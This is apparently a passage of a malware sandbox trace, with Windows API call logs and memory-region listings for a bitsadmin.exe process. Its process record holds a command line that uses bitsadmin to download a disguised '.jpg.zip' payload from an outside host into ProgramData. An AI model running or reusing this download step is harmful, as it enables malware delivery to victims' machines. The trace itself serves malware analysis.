[0069.105] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8f414 | out: lpConsoleScreenBufferInfo=0x8f414) returned 1
[0069.106] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8f42c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8f42c*=0x8) returned 1
[0069.106] CoTaskMemFree (pv=0x1f8398)
[0069.107] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 0
[0069.107] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8fdb0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0069.375] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 1
[0069.375] TranslateMessage (lpMsg=0x8fd88) returned 0
[0069.375] DispatchMessageW (lpMsg=0x8fd88) returned 0x1
[0069.375] IBackgroundCopyCallback:JobTransferred (This=0x200c88, pJob=0x1ea6a4) returned 0x0
[0069.375] KillTimer (hWnd=0x0, uIDEvent=0x7fc2) returned 1
[0069.375] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0069.376] IBackgroundCopyCallback:JobModification (This=0x200c88, pJob=0x1ea6a4, dwReserved=0x0) returned 0x0
[0069.376] IBackgroundCopyJob:GetState (in: This=0x1ea614, pVal=0x200c94 | out: pVal=0x200c94) returned 0x0
[0069.377] IBackgroundCopyJob:GetType (in: This=0x1ea614, pVal=0x8e3c0 | out: pVal=0x8e3c0) returned 0x0
[0069.378] IBackgroundCopyJob:GetProgress (in: This=0x1ea614, pVal=0x200c98 | out: pVal=0x200c98) returned 0x0
[0069.379] IBackgroundCopyJob:GetPriority (in: This=0x1ea614, pVal=0x8e3bc | out: pVal=0x8e3bc) returned 0x0
[0069.380] CoTaskMemFree (pv=0x0)
[0069.380] IBackgroundCopyJob:GetDisplayName (in: This=0x1ea614, pVal=0x8e3d4 | out: pVal=0x8e3d4*="msd5") returned 0x0
[0069.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e37c | out: lpConsoleScreenBufferInfo=0x8e37c) returned 1
[0069.381] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8e394 | out: lpNumberOfCharsWritten=0x8e394) returned 1
[0069.381] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8e394 | out: lpNumberOfAttrsWritten=0x8e394) returned 1
[0069.381] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0069.382] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e368 | out: lpConsoleScreenBufferInfo=0x8e368) returned 1
[0069.382] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e380, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e380*=0xa) returned 1
[0069.382] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e364 | out: lpConsoleScreenBufferInfo=0x8e364) returned 1
[0069.383] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8e37c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e37c*=0x5) returned 1
[0069.383] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.383] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e36c | out: lpConsoleScreenBufferInfo=0x8e36c) returned 1
[0069.383] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8e384, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e384*=0x7) returned 1
[0069.384] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e360 | out: lpConsoleScreenBufferInfo=0x8e360) returned 1
[0069.384] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e378, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e378*=0x8) returned 1
[0069.384] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e368 | out: lpConsoleScreenBufferInfo=0x8e368) returned 1
[0069.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e380, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e380*=0x8) returned 1
[0069.385] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0069.385] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0xd) returned 1
[0069.386] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e36c | out: lpConsoleScreenBufferInfo=0x8e36c) returned 1
[0069.386] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e384, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e384*=0xa) returned 1
[0069.386] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.386] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e354 | out: lpConsoleScreenBufferInfo=0x8e354) returned 1
[0069.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8e36c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e36c*=0xa) returned 1
[0069.387] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0069.387] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x8) returned 1
[0069.388] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.388] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e380 | out: _Buffer="1") returned 1
[0069.388] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e38c | out: _Buffer="1") returned 1
[0069.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0069.388] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x5) returned 1
[0069.388] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0069.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e364 | out: lpConsoleScreenBufferInfo=0x8e364) returned 1
[0069.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8e37c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e37c*=0x8) returned 1
[0069.389] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.389] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e388 | out: _Buffer="156672") returned 6
[0069.389] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e38c | out: _Buffer="156672") returned 6
[0069.389] _vsnwprintf (in: _Buffer=0x8203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8e388 | out: _Buffer="100") returned 3
[0069.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e384 | out: lpConsoleScreenBufferInfo=0x8e384) returned 1
[0069.390] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x8e39c, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e39c*=0x16) returned 1
[0069.390] CoTaskMemFree (pv=0x1f8398)
[0069.390] IBackgroundCopyJob:Complete (This=0x1ea614) returned 0x0
[0069.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e388 | out: lpConsoleScreenBufferInfo=0x8e388) returned 1
[0069.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0069.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x2) returned 1
[0069.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8e35c | out: lpConsoleScreenBufferInfo=0x8e35c) returned 1
[0069.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x8143c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x8e374, lpReserved=0x0 | out: lpBuffer=0x8143c4*, lpNumberOfCharsWritten=0x8e374*=0x14) returned 1
[0069.398] GetCurrentThreadId () returned 0xc3c
[0069.398] PostThreadMessageW (idThread=0xc3c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0069.399] PeekMessageW (in: lpMsg=0x8fd88, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8fd88) returned 1
[0069.399] IUnknown:Release (This=0x1ea614) returned 0x1
[0069.399] IUnknown:Release (This=0x1ea53c) returned 0x0
[0069.400] CoUninitialize ()
[0069.400] IUnknown:Release (This=0x200c88) returned 0x2
[0069.400] IUnknown:Release (This=0x200c88) returned 0x1
[0069.400] IUnknown:Release (This=0x200c88) returned 0x0
[0069.400] IUnknown:Release (This=0x1ea614) returned 0x1
[0069.400] CoTaskMemFree (pv=0x200c88)
[0069.404] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0069.404] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0069.404] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0069.404] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0069.404] CloseHandle (hObject=0x80) returned 1
[0069.405] exit (_Code=0)
Thread:
id = 142
os_tid = 0xc50
Thread:
id = 143
os_tid = 0xc54
Thread:
id = 144
os_tid = 0xc58
Thread:
id = 145
os_tid = 0xc5c
Process:
id = "13"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be280"
os_pid = "0xc68"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmf.jpg.zip?161905089 C:\\ProgramData\\tempa\\marxvxinhhmf.jpg"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1492
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1493
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1494
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1495
start_va = 0xb0000
end_va = 0xeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 1496
start_va = 0xa40000
end_va = 0xa83fff
entry_point = 0xa40000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1497
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1498
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1499
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1500
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1501
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1502
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1503
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1504
start_va = 0xf0000
end_va = 0x156fff
entry_point = 0xf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1505
start_va = 0x170000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1506
start_va = 0x270000
end_va = 0x337fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 1507
start_va = 0x3a0000
end_va = 0x3affff
entry_point = 0x0
region_type = private
name = "private_0x00000000003a0000"
filename = ""
Region:
id = 1508
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1509
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1510
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1511
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1512
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1513
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1514
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1515
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1516
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1517
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1518
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1519
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1520
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1521
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1522
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1523
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1524
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1525
start_va = 0x50000
end_va = 0x56fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1526
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1527
start_va = 0x70000
end_va = 0x70fff
entry_point = 0x70000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1528
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 1529
start_va = 0x90000
end_va = 0x90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 1530
start_va = 0x3b0000
end_va = 0x4b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 1531
start_va = 0xa90000
end_va = 0x168ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 1532
start_va = 0x340000
end_va = 0x39bfff
entry_point = 0x340000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1533
start_va = 0x340000
end_va = 0x39bfff
entry_point = 0x340000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1534
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1535
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1536
start_va = 0x4c0000
end_va = 0x6dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 1537
start_va = 0x4c0000
end_va = 0x59efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1538
start_va = 0x6a0000
end_va = 0x6dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 1539
start_va = 0xa0000
end_va = 0xa0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 1540
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1541
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1542
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 1543
start_va = 0x5d0000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1544
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1545
start_va = 0x620000
end_va = 0x65ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 1546
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1547
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1548
start_va = 0x340000
end_va = 0x37bfff
entry_point = 0x340000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1549
start_va = 0x340000
end_va = 0x37bfff
entry_point = 0x340000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1550
start_va = 0x340000
end_va = 0x37bfff
entry_point = 0x340000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1551
start_va = 0x340000
end_va = 0x37bfff
entry_point = 0x340000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1552
start_va = 0x340000
end_va = 0x37bfff
entry_point = 0x340000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1553
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1554
start_va = 0x6e0000
end_va = 0x9aefff
entry_point = 0x6e0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1555
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1556
start_va = 0x16f0000
end_va = 0x172ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000016f0000"
filename = ""
Region:
id = 1557
start_va = 0x1780000
end_va = 0x17bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001780000"
filename = ""
Region:
id = 1558
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1559
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1560
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 147
os_tid = 0xc6c
[0069.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xeff1c | out: lpSystemTimeAsFileTime=0xeff1c*(dwLowDateTime=0xda0db1f0, dwHighDateTime=0x1d469c7))
[0069.526] GetCurrentProcessId () returned 0xc68
[0069.526] GetCurrentThreadId () returned 0xc6c
[0069.526] GetTickCount () returned 0x1f508
[0069.526] QueryPerformanceCounter (in: lpPerformanceCount=0xeff14 | out: lpPerformanceCount=0xeff14*=1814347200000) returned 1
[0069.527] GetModuleHandleA (lpModuleName=0x0) returned 0xa40000
[0069.527] __set_app_type (_Type=0x1)
[0069.527] __p__fmode () returned 0x757a31f4
[0069.527] __p__commode () returned 0x757a31fc
[0069.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa67f33) returned 0x0
[0069.527] __wgetmainargs (in: _Argc=0xa80824, _Argv=0xa8082c, _Env=0xa80828, _DoWildCard=0, _StartInfo=0xa80838 | out: _Argc=0xa80824, _Argv=0xa8082c, _Env=0xa80828) returned 0
[0069.528] _onexit (_Func=0xa6925e) returned 0xa6925e
[0069.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0069.528] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0069.529] AitLogFeatureUsageByApp () returned 0x0
[0069.529] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0069.529] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0069.529] VerifyVersionInfoW (in: lpVersionInformation=0xefd90, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0xefd90) returned 1
[0069.529] SetLastError (dwErrCode=0x0)
[0069.529] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
